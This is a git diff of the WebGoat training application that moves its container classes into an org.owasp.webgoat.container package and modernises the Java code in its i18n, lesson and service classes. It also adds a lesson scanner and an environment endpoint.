 import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.servlet.ModelAndView;
 
 import javax.servlet.http.HttpServletRequest;
@@ -56,7 +55,7 @@ public class Welcome {
      * @param request a {@link javax.servlet.http.HttpServletRequest} object.
      * @return a {@link org.springframework.web.servlet.ModelAndView} object.
      */
-    @RequestMapping(path = {"welcome.mvc", "/"}, method = RequestMethod.GET)
+    @GetMapping(path = {"welcome.mvc"})
     public ModelAndView welcome(HttpServletRequest request) {
 
         // set the welcome attribute
@@ -69,8 +68,6 @@ public class Welcome {
         
         //go ahead and send them to webgoat (skip the welcome page)
         ModelAndView model = new ModelAndView();
-        //model.setViewName("welcome");
-        //model.setViewName("main_new");
         model.setViewName("forward:/attack?start=true");
         return model;
     }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/i18n/Language.java b/src/main/java/org/owasp/webgoat/container/i18n/Language.java
similarity index 97%
rename from webgoat-container/src/main/java/org/owasp/webgoat/i18n/Language.java
rename to src/main/java/org/owasp/webgoat/container/i18n/Language.java
index d2fe5bd95..96a039979 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/i18n/Language.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/Language.java
@@ -23,7 +23,7 @@
  * <p>
  */
 
-package org.owasp.webgoat.i18n;
+package org.owasp.webgoat.container.i18n;
 
 import lombok.AllArgsConstructor;
 import org.springframework.web.context.request.RequestContextHolder;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/i18n/Messages.java b/src/main/java/org/owasp/webgoat/container/i18n/Messages.java
similarity index 97%
rename from webgoat-container/src/main/java/org/owasp/webgoat/i18n/Messages.java
rename to src/main/java/org/owasp/webgoat/container/i18n/Messages.java
index e7758c43c..04a3b3ad5 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/i18n/Messages.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/Messages.java
@@ -23,7 +23,7 @@
  * <p>
  */
 
-package org.owasp.webgoat.i18n;
+package org.owasp.webgoat.container.i18n;
 
 import lombok.AllArgsConstructor;
 import org.springframework.context.support.ReloadableResourceBundleMessageSource;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/i18n/PluginMessages.java b/src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
similarity index 77%
rename from webgoat-container/src/main/java/org/owasp/webgoat/i18n/PluginMessages.java
rename to src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
index a2a046bf3..e0c6d3583 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/i18n/PluginMessages.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
@@ -23,14 +23,12 @@
  * <p>
  */
 
-package org.owasp.webgoat.i18n;
+package org.owasp.webgoat.container.i18n;
 
 import org.springframework.context.support.ReloadableResourceBundleMessageSource;
+import org.springframework.core.io.support.ResourcePatternResolver;
 
 import java.io.IOException;
-import java.net.URISyntaxException;
-import java.net.URL;
-import java.util.Enumeration;
 import java.util.Properties;
 
 /**
@@ -42,12 +40,15 @@ import java.util.Properties;
 public class PluginMessages extends ReloadableResourceBundleMessageSource {
     private static final String PROPERTIES_SUFFIX = ".properties";
 
-    private Language language;
+    private final Language language;
+    private final ResourcePatternResolver resourcePatternResolver;
 
-    public PluginMessages(Messages messages, Language language) {
+
+    public PluginMessages(Messages messages, Language language, ResourcePatternResolver resourcePatternResolver) {
         this.language = language;
         this.setParentMessageSource(messages);
         this.setBasename("WebGoatLabels");
+        this.resourcePatternResolver = resourcePatternResolver;
     }
 
     @Override
@@ -55,16 +56,15 @@ public class PluginMessages extends ReloadableResourceBundleMessageSource {
         Properties properties = new Properties();
         long lastModified = System.currentTimeMillis();
 
-        Enumeration<URL> resources = null;
         try {
-            resources = Thread.currentThread().getContextClassLoader().getResources(filename + PROPERTIES_SUFFIX);
-            while (resources.hasMoreElements()) {
-                URL resource = resources.nextElement();
-                String sourcePath = resource.toURI().toString().replace(PROPERTIES_SUFFIX, "");
+            var resources = resourcePatternResolver.getResources("classpath:/lessons/**/i18n" +
+                    "/WebGoatLabels" + PROPERTIES_SUFFIX);
+            for (var resource : resources) {
+                String sourcePath = resource.getURI().toString().replace(PROPERTIES_SUFFIX, "");
                 PropertiesHolder holder = super.refreshProperties(sourcePath, propHolder);
                 properties.putAll(holder.getProperties());
             }
-        } catch (IOException | URISyntaxException e) {
+        } catch (IOException e) {
             logger.error("Unable to read plugin message", e);
         }
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java b/src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
similarity index 86%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
rename to src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
index 3657ffe0e..f7f726186 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import lombok.*;
 
@@ -66,14 +66,4 @@ public class Assignment {
         this.hints = hints;
     }
 
-    /**
-     * Set path is here to overwrite stored paths.
-     * Since a stored path can no longer be used in a lesson while
-     * the lesson (name) itself is still part of the lesson.
-     *
-     * @param pathName the path
-     */
-    public void setPath(String pathName) {
-        this.path = pathName;
-    }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
similarity index 98%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java
rename to src/main/java/org/owasp/webgoat/container/lessons/Category.java
index e510ca14a..238d6fe6d 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import lombok.Getter;
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/CourseConfiguration.java b/src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
similarity index 91%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/CourseConfiguration.java
rename to src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
index e36bde1df..fccc1fa16 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/CourseConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang3.ArrayUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.Course;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.util.CollectionUtils;
@@ -67,9 +67,11 @@ public class CourseConfiguration {
         var endpoints = assignmentsByPackage.get(lesson.getClass().getPackageName());
         if (CollectionUtils.isEmpty(endpoints)) {
             log.warn("Lesson: {} has no endpoints, is this intentionally?", lesson.getTitle());
-            return new ArrayList();
+            return new ArrayList<>();
         }
-        return endpoints.stream().map(e -> new Assignment(e.getClass().getSimpleName(), getPath(e.getClass()), getHints(e.getClass()))).collect(toList());
+        return endpoints.stream()
+                .map(e -> new Assignment(e.getClass().getSimpleName(), getPath(e.getClass()), getHints(e.getClass())))
+                .toList();
     }
 
     private String getPath(Class<? extends AssignmentEndpoint> e) {
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Hint.java b/src/main/java/org/owasp/webgoat/container/lessons/Hint.java
similarity index 96%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/Hint.java
rename to src/main/java/org/owasp/webgoat/container/lessons/Hint.java
index c2205b240..8b61b904a 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Hint.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Hint.java
@@ -25,7 +25,7 @@
  * 
  */
 
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import lombok.Value;
 
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java b/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java
new file mode 100644
index 000000000..6c810d7ca
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java
@@ -0,0 +1,12 @@
+package org.owasp.webgoat.container.lessons;
+
+import org.owasp.webgoat.container.users.WebGoatUser;
+
+/**
+ * Interface for initialization of a lesson. It is called when a new user is added to WebGoat and when a users
+ * reset a lesson. Make sure to clean beforehand and then re-initialize the lesson.
+ */
+public interface Initializeable {
+
+    void initialize(WebGoatUser webGoatUser);
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Lesson.java b/src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
similarity index 89%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/Lesson.java
rename to src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
index 0bc5546ef..91c0743e7 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Lesson.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
@@ -20,11 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import lombok.Getter;
 import lombok.Setter;
-import lombok.Singular;
 
 import java.util.List;
 
@@ -39,7 +38,7 @@ public abstract class Lesson {
     /**
      * Constructor for the Lesson object
      */
-    public Lesson() {
+    protected Lesson() {
         id = ++count;
     }
 
@@ -66,7 +65,7 @@ public abstract class Lesson {
     /**
      * <p>getDefaultCategory.</p>
      *
-     * @return a {@link org.owasp.webgoat.lessons.Category} object.
+     * @return a {@link org.owasp.webgoat.container.lessons.Category} object.
      */
     protected abstract Category getDefaultCategory();
 
@@ -122,4 +121,16 @@ public abstract class Lesson {
     public final String getId() {
         return this.getClass().getSimpleName();
     }
+
+    public final String getPackage() {
+        var packageName = this.getClass().getPackageName();
+        //package name is the direct package name below lessons (any subpackage will be removed)
+        return packageName.replaceAll("org.owasp.webgoat.lessons.", "").replaceAll("\\..*", "");
+
+
+
+    }
+
+
+
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonConnectionInvocationHandler.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
similarity index 76%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonConnectionInvocationHandler.java
rename to src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
index e9958f2b7..fa2643eff 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonConnectionInvocationHandler.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
@@ -1,6 +1,7 @@
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
-import org.owasp.webgoat.users.WebGoatUser;
+import lombok.extern.slf4j.Slf4j;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.security.core.context.SecurityContextHolder;
 
 import java.lang.reflect.InvocationHandler;
@@ -12,6 +13,7 @@ import java.sql.Connection;
  * Handler which sets the correct schema for the currently bounded user. This way users are not seeing each other
  * data and we can reset data for just one particular user.
  */
+@Slf4j
 public class LessonConnectionInvocationHandler implements InvocationHandler {
 
     private final Connection targetConnection;
@@ -23,9 +25,10 @@ public class LessonConnectionInvocationHandler implements InvocationHandler {
     @Override
     public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
         var authentication = SecurityContextHolder.getContext().getAuthentication();
-        if (authentication != null && authentication.getPrincipal() instanceof WebGoatUser) {
-            var user = (WebGoatUser) authentication.getPrincipal();
-            targetConnection.createStatement().execute("SET SCHEMA \"" + user.getUsername() + "\"");
+        if (authentication != null && authentication.getPrincipal() instanceof WebGoatUser user) {
+            try (var statement = targetConnection.createStatement()) {
+                statement.execute("SET SCHEMA \"" + user.getUsername() + "\"");
+            }
         }
         try {
             return method.invoke(targetConnection, args);
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonInfoModel.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
similarity index 87%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonInfoModel.java
rename to src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
index 4a7bab3a7..3c77ce095 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonInfoModel.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItem.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
similarity index 97%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItem.java
rename to src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
index 578f76ea0..6133e8c06 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItem.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
@@ -27,7 +27,7 @@
  * https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
@@ -42,7 +42,7 @@ public class LessonMenuItem {
 
     private String name;
     private LessonMenuItemType type;
-    private List<LessonMenuItem> children = new ArrayList<LessonMenuItem>();
+    private List<LessonMenuItem> children = new ArrayList<>();
     private boolean complete;
     private String link;
     private int ranking;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItemType.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
similarity index 96%
rename from webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItemType.java
rename to src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
index 418f92300..e29cce641 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/LessonMenuItemType.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
@@ -25,7 +25,7 @@
  * 
  */
 
-package org.owasp.webgoat.lessons;
+package org.owasp.webgoat.container.lessons;
 
 /**
  * <p>LessonMenuItemType class.</p>
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java
new file mode 100644
index 000000000..5f9fb86af
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java
@@ -0,0 +1,46 @@
+package org.owasp.webgoat.container.lessons;
+
+import lombok.Getter;
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.core.io.ClassPathResource;
+import org.springframework.core.io.support.ResourcePatternResolver;
+import org.springframework.stereotype.Component;
+
+import java.io.IOException;
+import java.util.ArrayList;
+import java.util.HashSet;
+import java.util.List;
+import java.util.Set;
+import java.util.regex.Pattern;
+
+@Component
+@Slf4j
+public class LessonScanner {
+
+    private static final Pattern lessonPattern = Pattern.compile("^.*/lessons/([^/]*)/.*$");
+
+    @Getter
+    private final Set<String> lessons = new HashSet<>();
+
+    public LessonScanner(ResourcePatternResolver resourcePatternResolver) {
+        try {
+            var resources = resourcePatternResolver.getResources("classpath:/lessons/*/*");
+            for (var resource : resources) {
+                //WG can run as a fat jar or as directly from file system we need to support both so use the URL
+                var url = resource.getURL();
+                var matcher = lessonPattern.matcher(url.toString());
+                if (matcher.matches()) {
+                    lessons.add(matcher.group(1));
+                }
+            }
+            log.debug("Found {} lessons", lessons.size());
+        } catch (IOException e) {
+            log.warn("No lessons found...");
+        }
+
+    }
+
+    public List<String> applyPattern(String pattern) {
+        return lessons.stream().map(lesson -> String.format(pattern, lesson)).toList();
+    }
+}
diff --git a/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java b/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java
new file mode 100644
index 000000000..4ab4967af
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java
@@ -0,0 +1,19 @@
+package org.owasp.webgoat.container.service;
+
+import lombok.RequiredArgsConstructor;
+import org.springframework.context.ApplicationContext;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController("/environment")
+@RequiredArgsConstructor
+public class EnvironmentService {
+
+    private final ApplicationContext context;
+
+    @GetMapping("/server-directory")
+    public String homeDirectory() {
+        return context.getEnvironment().getProperty("webgoat.server.directory");
+    }
+
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/HintService.java b/src/main/java/org/owasp/webgoat/container/service/HintService.java
similarity index 76%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/HintService.java
rename to src/main/java/org/owasp/webgoat/container/service/HintService.java
index 43dd88c57..a0fc4da83 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/HintService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/HintService.java
@@ -4,20 +4,19 @@
  * and open the template in the editor.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.lessons.Hint;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Hint;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
+import java.util.Collection;
 import java.util.List;
 
-import static java.util.stream.Collectors.toList;
-
 /**
  * <p>HintService class.</p>
  *
@@ -49,14 +48,14 @@ public class HintService {
     private List<Hint> createAssignmentHints(Lesson l) {
         if (l != null) {
             return l.getAssignments().stream()
-                    .map(a -> createHint(a))
-                    .flatMap(hints -> hints.stream())
-                    .collect(toList());
+                    .map(this::createHint)
+                    .flatMap(Collection::stream)
+                    .toList();
         }
         return List.of();
     }
 
     private List<Hint> createHint(Assignment a) {
-        return a.getHints().stream().map(h -> new Hint(h, a.getPath())).collect(toList());
+        return a.getHints().stream().map(h -> new Hint(h, a.getPath())).toList();
     }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/LabelDebugService.java b/src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java
similarity index 86%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/LabelDebugService.java
rename to src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java
index 57c688a22..2c23ceac2 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LabelDebugService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java
@@ -27,11 +27,11 @@
  * https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.session.LabelDebugger;
+import org.owasp.webgoat.container.session.LabelDebugger;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.MediaType;
 import org.springframework.http.ResponseEntity;
@@ -40,7 +40,6 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.util.HashMap;
 import java.util.Map;
 
 /**
@@ -75,13 +74,13 @@ public class LabelDebugService {
 
     /**
      * Sets the enabled flag on the label debugger to the given parameter
-     * @param enabled {@link org.owasp.webgoat.session.LabelDebugger} object
-     * @throws Exception unhandled exception
+     *
+     * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
      * @return a {@link org.springframework.http.ResponseEntity} object.
      */
     @RequestMapping(value = URL_DEBUG_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE, params = KEY_ENABLED)
     public @ResponseBody
-    ResponseEntity<Map<String, Object>> setDebuggingStatus(@RequestParam("enabled") Boolean enabled) throws Exception {
+    ResponseEntity<Map<String, Object>> setDebuggingStatus(@RequestParam("enabled") Boolean enabled) {
         log.debug("Setting label debugging to {} ", labelDebugger.isEnabled());
         Map<String, Object> result = createResponse(enabled);
         labelDebugger.setEnabled(enabled);
@@ -89,13 +88,10 @@ public class LabelDebugService {
     }
 
     /**
-     * @param enabled {@link org.owasp.webgoat.session.LabelDebugger} object
+     * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
      * @return a {@link java.util.Map} object.
      */
     private Map<String, Object> createResponse(Boolean enabled) {
-        Map<String, Object> result = new HashMap<String, Object>();
-        result.put(KEY_SUCCESS, Boolean.TRUE);
-        result.put(KEY_ENABLED, enabled);
-        return result;
+        return Map.of(KEY_SUCCESS, Boolean.TRUE, KEY_ENABLED, enabled);
     }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/LabelService.java b/src/main/java/org/owasp/webgoat/container/service/LabelService.java
similarity index 54%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/LabelService.java
rename to src/main/java/org/owasp/webgoat/container/service/LabelService.java
index 5ad522a5c..5a6d06b95 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LabelService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LabelService.java
@@ -27,25 +27,19 @@
  * for free software projects.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
-import lombok.AllArgsConstructor;
+import lombok.RequiredArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.i18n.Messages;
-import org.owasp.webgoat.i18n.PluginMessages;
+import org.owasp.webgoat.container.i18n.Messages;
+import org.owasp.webgoat.container.i18n.PluginMessages;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.MediaType;
 import org.springframework.http.ResponseEntity;
-import org.springframework.util.StringUtils;
 import org.springframework.web.bind.annotation.GetMapping;
-import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
-import org.springframework.web.servlet.LocaleResolver;
-import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.Locale;
 import java.util.Properties;
 
 
@@ -56,35 +50,20 @@ import java.util.Properties;
  */
 @RestController
 @Slf4j
-@AllArgsConstructor
+@RequiredArgsConstructor
 public class LabelService {
 
     public static final String URL_LABELS_MVC = "/service/labels.mvc";
-    private LocaleResolver localeResolver;
-    private Messages messages;
-    private PluginMessages pluginMessages;
+    private final Messages messages;
+    private final PluginMessages pluginMessages;
 
     /**
-     * We use Springs session locale resolver which also gives us the option to change the local later on. For
-     * now it uses the accept-language from the HttpRequest. If this language is not found it will default back
-     * to messages.properties.
-     * <p>
-     * Note although it is possible to use Spring language interceptor we for now opt for this solution, the UI
-     * will always need to fetch the labels with the new language set by the user. So we don't need to intercept each
-     * and every request to see if the language param has been set in the request.
-     *
-     * @param lang the language to fetch labels for (optional)
-     * @return a map of labels
+     * @return a map of all the labels
      */
     @GetMapping(path = URL_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE)
     @ResponseBody
-    public ResponseEntity<Properties> fetchLabels(@RequestParam(value = "lang", required = false) String lang) {
-        if (!StringUtils.isEmpty(lang)) {
-            Locale locale = Locale.forLanguageTag(lang);
-            ((SessionLocaleResolver) localeResolver).setDefaultLocale(locale);
-            log.debug("Language provided: {} leads to Locale: {}", lang, locale);
-        }
-        Properties allProperties = new Properties();
+    public ResponseEntity<Properties> fetchLabels() {
+        var allProperties = new Properties();
         allProperties.putAll(messages.getMessages());
         allProperties.putAll(pluginMessages.getMessages());
         return new ResponseEntity<>(allProperties, HttpStatus.OK);
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonInfoService.java b/src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java
similarity index 79%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/LessonInfoService.java
rename to src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java
index 9396e0225..ccbf77f40 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonInfoService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonInfoService.java
@@ -1,9 +1,9 @@
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.LessonInfoModel;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.LessonInfoModel;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java b/src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java
similarity index 77%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
rename to src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java
index 865d6b85a..6fe6d32e3 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonMenuService.java
@@ -27,19 +27,19 @@
  * https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.LessonMenuItem;
-import org.owasp.webgoat.lessons.LessonMenuItemType;
-import org.owasp.webgoat.session.Course;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.LessonTracker;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.LessonMenuItem;
+import org.owasp.webgoat.container.lessons.LessonMenuItemType;
+import org.owasp.webgoat.container.session.Course;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.LessonTracker;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -49,7 +49,6 @@ import java.util.ArrayList;
 import java.util.Comparator;
 import java.util.List;
 import java.util.Map;
-import java.util.stream.Collectors;
 
 /**
  * <p>LessonMenuService class.</p>
@@ -71,7 +70,7 @@ public class LessonMenuService {
 
     @Value("#{'${exclude.lessons}'.split(',')}")
     private List<String> excludeLessons;
-    
+
     /**
      * Returns the lesson menu which is used to build the left nav
      *
@@ -86,19 +85,19 @@ public class LessonMenuService {
         UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
 
         for (Category category : categories) {
-        	if (excludeCategories.contains(category.name())) { 
-        		continue;
-        	}
+            if (excludeCategories.contains(category.name())) {
+                continue;
+            }
             LessonMenuItem categoryItem = new LessonMenuItem();
             categoryItem.setName(category.getName());
             categoryItem.setType(LessonMenuItemType.CATEGORY);
             // check for any lessons for this category
             List<Lesson> lessons = course.getLessons(category);
-            lessons = lessons.stream().sorted(Comparator.comparing(l -> l.getTitle())).collect(Collectors.toList());
+            lessons = lessons.stream().sorted(Comparator.comparing(Lesson::getTitle)).toList();
             for (Lesson lesson : lessons) {
-            	if (excludeLessons.contains(lesson.getName())) {
-            		continue;
-            	}
+                if (excludeLessons.contains(lesson.getName())) {
+                    continue;
+                }
                 LessonMenuItem lessonItem = new LessonMenuItem();
                 lessonItem.setName(lesson.getTitle());
                 lessonItem.setLink(lesson.getLink());
@@ -118,14 +117,14 @@ public class LessonMenuService {
     private boolean lessonCompleted(Map<Assignment, Boolean> map, Lesson currentLesson) {
         boolean result = true;
         for (Map.Entry<Assignment, Boolean> entry : map.entrySet()) {
-        	    Assignment storedAssignment = entry.getKey();
-            	for (Assignment lessonAssignment: currentLesson.getAssignments()) {
-            		if (lessonAssignment.getName().equals(storedAssignment.getName())) {
-            			result = result && entry.getValue();
-            			break;
-            		}
-            	}
-            
+            Assignment storedAssignment = entry.getKey();
+            for (Assignment lessonAssignment : currentLesson.getAssignments()) {
+                if (lessonAssignment.getName().equals(storedAssignment.getName())) {
+                    result = result && entry.getValue();
+                    break;
+                }
+            }
+
         }
         return result;
     }
